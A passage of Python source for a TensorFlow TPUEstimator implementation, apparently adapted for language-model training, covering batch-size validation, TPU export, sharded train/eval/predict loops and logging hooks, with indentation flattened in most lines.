override execution of eval. See below.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU besides the one on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings`
object to fully configure warm-starting. If the string
filepath is provided instead of a `WarmStartSettings`,
then all variables are warm-started, and it is assumed
that vocabularies and Tensor names are unchanged.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
"`config` must be provided with type `tpu_config.RunConfig`"
)
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError(
"{} are reserved keys but exist in params {}.".format(
_RESERVED_PARAMS_KEYS, params
)
)
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError("`train_batch_size` cannot be `None`")
util_lib.check_positive_integer(train_batch_size, "train_batch_size")
if (
config.tpu_config.per_host_input_for_training
is tpu_config.InputPipelineConfig.PER_SHARD_V1
and config.tpu_config.num_cores_per_replica
):
raise ValueError(
"Model parallelism only supports per host input for training. "
"Please adjust TPURunconfig.per_host_input_for_training."
)
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, "eval_batch_size")
if predict_batch_size is not None:
util_lib.check_positive_integer(
predict_batch_size, "predict_batch_size"
)
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(
model_fn, params
) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(
model_fn, train_cache_fn, eval_cache_fn, batch_axis
)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from,
)
self._iterations_per_training_loop = self._config.tpu_config.iterations_per_loop
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config,
train_batch_size,
eval_batch_size,
predict_batch_size,
use_tpu,
eval_on_tpu,
)
self._export_to_tpu = export_to_tpu
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(
self,
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
raise NotImplementedError(
"TPUEstimator only handles mode PREDICT for exporting "
"when `export_to_tpu` is `True`; "
"got {}.".format(mode)
)
(
super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
)
)
if self._export_to_tpu:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
(
super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=False,
mode=mode,
export_tags=export_tags,
check_variables=False,
)
)
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config
)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError(
"mode must be {}; " "got {}.".format(_REWRITE_FOR_INFERENCE_MODE, mode)
)
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
tensors_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs)
)
tensors = nest.flatten(tensors_dict)
tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)]
# We cannot return anything other than `tpu_tensors` here so we capture
# the rest for later use.
capture.capture((estimator_spec, tensors_dict, tensors))
return tpu_tensors
tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation)
estimator_spec, tensors_dict, tensors = capture.get()
# Reconstruct `tensors`, but with `tpu_tensors` replaced with
# `tpu_tensors_on_cpu`.
new_tensors = []
for t in tensors:
if _is_tpu_tensor(t):
new_tensors.append(tpu_tensors_on_cpu.pop(0))
elif t is None:
new_tensors.append(None)
else:
# Fetching only this non-TPU tensor would not trigger the TPU
# computation, so we add a control dependency on the TPU outputs here.
control_inputs = (
tpu_tensors_on_cpu
if isinstance(tpu_tensors_on_cpu, (list, tuple))
else (tpu_tensors_on_cpu,)
)
with ops.control_dependencies(control_inputs):
new_tensors.append(array_ops.identity(t))
# Reconstruct `tensors_dict`.
new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors)
# Reconstruct `export_outputs`.
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_tensors_dict)
)
return estimator_spec._replace(export_outputs=new_export_outputs)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps
)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
"For TPU training, one of `steps` or `max_steps` must be set. "
"They cannot both be `None`."
)
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, "Train steps")
if max_steps is not None:
util_lib.check_positive_integer(max_steps, "Train max_steps")
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError("Evaluate `steps` must be set on TPU. Cannot be `None`.")
util_lib.check_positive_integer(steps, "Eval steps")
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps
),
_SetEvalIterationsHook(steps),
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if "params" in input_fn_args:
kwargs["params"] = self.params # a deep copy.
else:
raise ValueError(
"input_fn ({}) does not include params argument, "
"required by TPUEstimator to pass batch size as "
'params["batch_size"]'.format(input_fn)
)
if "config" in input_fn_args:
kwargs["config"] = config
if "mode" in input_fn_args:
kwargs["mode"] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Set the batch size in params first. This helps the user have the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(
kwargs["params"], _BATCH_SIZE_KEY, batch_size_for_input_fn
)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device("/device:CPU:0"):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs["params"], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates confusing warnings.
Args:
result: `features` returned by input_fn.
"""
pass
def train(
self, input_fn, hooks=None, steps=None, max_steps=None, saving_listeners=None
):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners,
)
except Exception: # pylint: disable=broad-except
rendezvous.record_error("training_loop", sys.exc_info())
finally:
rendezvous.record_done("training_loop")
rendezvous.raise_errors()
def evaluate(
self, input_fn, steps=None, hooks=None, checkpoint_path=None, name=None
):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name,
)
except Exception: # pylint: disable=broad-except
rendezvous.record_error("evaluation_loop", sys.exc_info())
finally:
rendezvous.record_done("evaluation_loop")
rendezvous.raise_errors()
def predict(
self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True,
):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples,
):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error("prediction_loop", sys.exc_info())
finally:
rendezvous.record_done("prediction_loop")
rendezvous.raise_errors()
rendezvous.record_done("prediction_loop")
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, train_cache_fn, eval_cache_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(
model_fn, train_cache_fn, eval_cache_fn, config, params, ctx
)
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
output_dir=self.model_dir,
every_n_steps=self._log_every_n_steps,
)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info("Running %s on CPU", mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode
)
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,)
)
return estimator_spec
assert labels is None, "`labels` passed to `model_fn` must be `None`."
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), "`input_fn` is not callable."
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn()
)
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold, training_hooks = _train_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn
)
if model_fn_wrapper._params.get("track_mean", False):
iterations_per_loop_var = _create_or_get_iterations_per_loop()
loss = math_ops.div(
loss,
math_ops.cast(iterations_per_loop_var, dtype=loss.dtype),
)
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get(
"TF_TPU_GRACEFUL_SHUTDOWN_MODE", "shutdown_worker"
)
if shutdown_mode:
if shutdown_mode == "shutdown_worker":
finalizer_hooks = [
session_support.ShutdownLameWorkers(
timeout_ms=60 * 1000
)
]
elif shutdown_mode == "shutdown_computation":
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60 * 1000)
]
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"'
% shutdown_mode
)
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + "/model.ckpt",
on_shutdown_hooks=finalizer_hooks,
)
)
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
logging_hook_frequency = ( # Divide and round up
self._log_every_n_steps
+ self._config.tpu_config.iterations_per_loop
- 1
) // self._config.tpu_config.iterations_per_loop
iterations_per_loop = array_ops.identity(
_create_or_get_iterations_per_loop()
)
hooks.extend(
[
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator
),
rendezvous=self._rendezvous[mode],
),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
"loss": array_ops.identity(loss),
"ppl": tensorflow.exp(loss),
"bpc": loss / tensorflow.constant(math.log(2)),
"#iter/loop": iterations_per_loop,
"global step": global_step,
},
every_n_iter=logging_hook_frequency,
),
]
)
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop
)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (
self._config.save_checkpoints_secs
or self._config.save_checkpoints_steps
):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold,
)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop
)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold,
)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold, eval_hooks = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn
)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype),
)
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops to have an update_op and calls them one
# by one. The real metric update_ops are invoked in a separate thread.
# So, here we give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var)
)
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret.get("eval_metrics", {}).items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if "host_call" not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret["host_call"]
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator
),
rendezvous=self._rendezvous[mode],
)
] + input_hooks
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold,
)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(
dummy_predict_op,
host_calls,
scaffold,
prediction_hooks,
) = _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the elements (via a generator) to the call site. So,
# the outfeed-based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue that we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if "host_call" not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret["host_call"]
predictions = host_call_ret["predictions"]
_verify_cross_hosts_transfer_size(
predictions,
message=(
"The estimated size for TPUEstimatorSpec.predictions is too "
"large."
),
)
signals = host_call_ret["signals"]
with ops.control_dependencies(host_ops):
host_ops = [] # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals
)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals
)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode]
),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold,
)
return _model_fn
def _is_tpu_tensor(tensor):
if not isinstance(tensor, ops.Tensor):
return False
try:
tensor.op.get_attr(
tpu._OUTSIDE_COMPILATION_ATTR
) # pylint: disable=protected-access
except ValueError:
return True
else:
return False
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output.outputs.values()
else:
raise ValueError(
"`export_output` must have type `ClassificationOutput`, "
"`RegressionOutput`, or `PredictOutput`; got {}.".format(export_output)
)
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError(
"tensors must be of length 2; " "got {}.".format(len(tensors))
)
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError(
"tensors must be of length 1; " "got {}".format(len(tensors))
)
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors))
)
else:
raise ValueError(
"`export_output` must have type `ClassificationOutput`, "
"`RegressionOutput`, or `PredictOutput`; got {}.".format(export_output)
)
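# Minimal sketch (unused by this module) of how `_export_output_to_tensors`
# and `_clone_export_output_with_tensors` pair up: extract the tensors,
# transform them, and rebuild an equivalent ExportOutput. The `logits`
# argument and the doubling transformation are assumptions for illustration.
def _example_clone_predict_output(logits):
  original = export_output_lib.PredictOutput({'logits': logits})
  tensors = list(_export_output_to_tensors(original))     # -> [logits]
  doubled = [math_ops.multiply(t, 2.0) for t in tensors]  # any rewrite
  return _clone_export_output_with_tensors(original, doubled)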
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(
single_tpu_eval_step,
host_calls,
captured_scaffold_fn,
captured_eval_hooks,
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
def multi_tpu_eval_steps_on_single_shard():
loop_vars = [_ZERO_LOSS]
if model_fn_wrapper._eval_cache_fn is not None:
batch_size = ctx.global_batch_size
num_shards = ctx._config._tpu_config.num_shards
loop_vars += model_fn_wrapper._eval_cache_fn(batch_size // num_shards)
return training_loop.repeat(
iterations_per_loop_var, single_tpu_eval_step, loop_vars
)
ret = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment,
)
loss = ret[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold, captured_eval_hooks.get()
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(
single_tpu_train_step,
host_call,
captured_scaffold_fn,
captured_training_hooks,
) = model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn)
def multi_tpu_train_steps_on_single_shard():
if model_fn_wrapper._params.get("track_mean", False):
loop_vars = [_ZERO_LOSS]
else:
loop_vars = [_INITIAL_LOSS]
if model_fn_wrapper._train_cache_fn is not None:
batch_size = ctx.global_batch_size
num_shards = ctx._config._tpu_config.num_shards
loop_vars += model_fn_wrapper._train_cache_fn(batch_size // num_shards)
return training_loop.repeat(
iterations_per_loop_var, single_tpu_train_step, loop_vars
)
ret = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment,
)
loss = ret[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold, captured_training_hooks.get()
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(
single_tpu_predict_step,
host_calls,
captured_scaffold_fn,
captured_predict_hooks,
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal)
)
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b"loop"
)
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment,
)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold, captured_predict_hooks.get()
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation,
[constant_op.constant(0)],
parallel_iterations=1,
)
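# Illustrative sketch only: wrapping a hypothetical list of enqueue ops so
# they run `iterations_per_loop` times on a given host device. The
# `enqueue_ops` argument and the device string are assumptions.
def _example_wrapped_enqueue_loop(enqueue_ops):
  return _wrap_computation_in_while_loop(
      device='/job:tpu_worker/task:0/device:CPU:0',
      op_fn=lambda: enqueue_ops)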
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value["ops"]
signals = return_value["signals"]
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond, computation, [_StopSignals.NON_STOPPING_SIGNAL], parallel_iterations=1
)
def _validate_tpu_training_graph():
"""Validates the graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [o for o in operations if o.type == _CROSS_REPLICA_SUM_OP]
if not cross_replica_sum_ops:
raise ValueError("CrossShardOptimizer must be used for model training on TPUs.")
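# Sketch of how a model_fn typically satisfies the CrossReplicaSum check
# above: wrapping the optimizer in CrossShardOptimizer makes gradients be
# all-reduced across shards, which inserts the required op. The local import,
# the plain SGD optimizer, and the `loss`/`learning_rate` arguments are
# assumptions for illustration (TF 1.x contrib layout assumed).
def _example_cross_shard_optimizer_train_op(loss, learning_rate):
  from tensorflow.contrib.tpu.python.tpu import tpu_optimizer  # assumed path
  optimizer = training.GradientDescentOptimizer(learning_rate)
  optimizer = tpu_optimizer.CrossShardOptimizer(optimizer)
  return optimizer.minimize(loss, global_step=training.get_global_step())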
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
"InternalError: Object can capture only once. Please file bug."
)
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
"InternalError: Object is not captured properly before `get`. "
"Please file bug."
)
return self._object
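# Minimal sketch of the capture pattern used throughout this file: a Python
# object created inside a control-flow body function is stashed in a
# _CapturedObject and read back after the loop has been built. The
# `build_loop` and `make_hooks` callables are assumptions for illustration.
def _example_captured_object(build_loop, make_hooks):
  captured_hooks = _CapturedObject()

  def body(step):
    captured_hooks.capture(make_hooks())  # may only be captured once
    return step + 1

  loop_op = build_loop(body)
  return loop_op, captured_hooks.get()    # read the object outside the body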
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message="Inside scaffold_fn"):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
"TPUEstimatorSpec.scaffold_fn returns None, which is not allowed"
)
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext("Inside Scaffold.finalize"):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
